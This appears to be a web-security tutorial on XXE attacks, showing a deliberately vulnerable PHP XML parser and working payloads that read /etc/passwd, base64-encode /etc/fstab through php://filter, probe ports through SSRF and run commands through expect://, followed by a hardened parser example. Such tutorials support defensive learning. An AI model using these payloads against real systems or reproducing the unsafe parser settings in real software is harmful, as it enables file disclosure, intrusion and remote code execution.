XML Attacks Part 2 : XXE (XML eXternal Entity) Attack

An XXE (XML eXternal Entity) attack is a type of attack against an application that parses XML input. It occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. In this attack it is specifically the "URI/URL" portion of the external entity declaration that is abused, and with it an attacker could do various malicious things, for example extracting sensitive data, Server-Side Request Forgery and, in some cases, even remote code execution (RCE). Now let's see how it works.

For demonstration purposes we use the PHP code below as a parser. I am using an Ubuntu 16.4 server VM with PHP 5.6.
<html>
<head>
  <title>XML Parser</title>
</head>
<body>
  <h2>Enter XML Code Here :</h2>
  <form action="" method="post">
    <textarea name="xml" rows="10" cols="50"></textarea><br/>
    <input type="submit" value="Submit"/>
  </form>

<?php

  if(!empty($_POST["xml"])) {
    // Re-enable loading of external entities: the unsafe setting this demo relies on
    libxml_disable_entity_loader(false);
    $xmlfile = $_POST["xml"];
    $dom = new DOMDocument();
    // LIBXML_NOENT substitutes entities and LIBXML_DTDLOAD loads the DTD; both are needed for XXE
    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
    $book = simplexml_import_dom($dom);
    $name = $book->name;
    $author = $book->author;
    $price = $book->price;
    echo "Book Details<br/><br/>Name : $name<br/>Author : $author<br/>Price : $price/-";
  }

?>

</body>
</html>


As we can see above, the PHP code parses our XML input and prints the values of its elements.

XXE Attacks :

As we know, when an external entity is used in an XML document, the XML parser reads the data from the given URI and permits it to be included within the document. At this point an attacker could send malicious data which forces the XML parser to access a resource specified by him, which could be a system file, a folder, a remote system or, in some cases, even a command executed on the system. Now let's see some examples.

Reading System Files :

To read a system file we have to replace the URI field of the external entity with the path of the file.
 <!ENTITY data SYSTEM "file:///Path_of_file">
Note that the "file://" handler is used to read the file. Example :
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE book [
  <!ENTITY data SYSTEM "file:///etc/passwd">
]>
<book>
  <name>&data;</name>
  <author>Nobody</author>
  <price>0000</price>
</book>
Output :


Similarly we can read other files as well, if it is permitted. Some examples are :
 <!ENTITY data SYSTEM "file:///etc/lsb-release">
Output :


Encoding Output to Base64 :

Sometimes, if the file contains special characters like "<", ">", "/" etc., the parser will try to parse it as XML and the output is not displayed. For example the "/etc/fstab" file contains these special characters, and when we try to read "/etc/fstab", nothing is shown because of the parse error.
 <!ENTITY data SYSTEM "file:///etc/fstab">
But if we use PHP's php://filter stream wrapper to base64-encode the resource, then we get the file content base64 encoded. The format of the base64-encoding URI is :
php://filter/read=convert.base64-encode/resource=/path_of_the_file
Now the XML code will be :
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE book [
  <!ENTITY data SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/fstab">
]>
<book>
  <name>&data;</name>
  <author>Nobody</author>
  <price>0000</price>
</book>
Output :


And we can decode it and see the content of the file.

There are, however, some limitations of the XXE attack; for example it cannot be used to obtain or read binary files.

Port Scanning with XXE :

It is a combination of XXE and SSRF (Server Side Request Forgery) attacks. In this attack we make the XML parser scan ports (that is, try to connect to a given port on the remote server) for us. Also note that this only works if the PHP server displays warnings; otherwise you don't see the results (I enabled warnings on my PHP setup). Now we need to provide the URI of the remote host with the port number.
<!ENTITY scan SYSTEM "http://scanme.nmap.org:22">
The above syntax scans port 22 of scanme.nmap.org. Example :
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE book [
  <!ENTITY scan SYSTEM "http://scanme.nmap.org:22/">
]>
<book>
  <name>&scan;</name>
  <author>Nobody</author>
  <price>0000</price>
</book>
Output :


As we can see, it shows the SSH banner, which means port 22 is open. For a closed port the warning will look like this :


Remote Code Execution :

If the expect module is installed and enabled on the PHP server, then we can execute code on the web server.
"expect://<command_to_execute>"
Example :
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE book [
  <!ENTITY cmd SYSTEM "expect://id">
]>
<book>
  <name>&cmd;</name>
  <author>Nobody</author>
  <price>0000</price>
</book>
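As a defender's counterpart to the parser shown at the top of the post and to every payload above (file://, php://filter, the http:// port probe and expect://), here is an added example of a hardened parse step; it is not code from the original post. It assumes the same book element names and uses a hypothetical function name, parse_book_safely.

```php
<?php
// Added example, not from the original post: a hardened drop-in for the
// parse step. Works on the PHP 5.6 setup the post uses and on PHP 7/8.
function parse_book_safely($xml)
{
    // Refuse any DTD up front. Every payload on this page needs an <!ENTITY>
    // declaration, which can only live inside a <!DOCTYPE>; the book format
    // never needs one, so a DOCTYPE is a reliable rejection signal.
    if (preg_match('/<!(DOCTYPE|ENTITY)/i', $xml)) {
        error_log('Rejected XML input containing a DOCTYPE/ENTITY declaration');
        return null;
    }

    if (PHP_VERSION_ID < 80000) {
        // Required on PHP 5.x/7.x; deprecated and unnecessary from PHP 8.0,
        // where external entity loading is already off by default.
        libxml_disable_entity_loader(true);
    }
    // Collect parse errors instead of emitting warnings: the port-scan
    // section above relies on those warnings leaking back to the client.
    libxml_use_internal_errors(true);

    $dom = new DOMDocument();
    // LIBXML_NONET forbids network access while parsing. The vulnerable
    // version's LIBXML_NOENT | LIBXML_DTDLOAD are deliberately NOT passed.
    $ok = $dom->loadXML($xml, LIBXML_NONET);
    libxml_clear_errors();
    if (!$ok || $dom->doctype !== null) {
        return null;
    }

    $book = simplexml_import_dom($dom);
    return array(
        'name'   => (string) $book->name,
        'author' => (string) $book->author,
        'price'  => (string) $book->price,
    );
}

// Constructed inputs: the page's /etc/passwd payload and a benign document.
$malicious = '<?xml version="1.0"?><!DOCTYPE book [<!ENTITY data SYSTEM "file:///etc/passwd">]>'
           . '<book><name>&data;</name><author>Nobody</author><price>0000</price></book>';
$benign = '<book><name>XML Security</name><author>Nobody</author><price>10</price></book>';

var_dump(parse_book_safely($malicious)); // rejected before libxml ever sees the entity
$b = parse_book_safely($benign);         // the benign document parses normally
// Escape before echoing; the original prints the parsed values raw into HTML.
echo 'Name : ' . htmlspecialchars($b['name'], ENT_QUOTES, 'UTF-8') . "\n";
```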

Conclusion :

In the next post we are going to look at how to perform DoS (Denial of Service) attacks with XXE.

XML Attacks Part 1 : Basic of XML structure and attack surface
XML Attacks Part 3 : Denial Of Service Attacks
XML Attacks Part 4 : Out Of Bound Attacks

Visit the link for more tutorials about Web Security : http://www.sec-art.net/p/web-security.html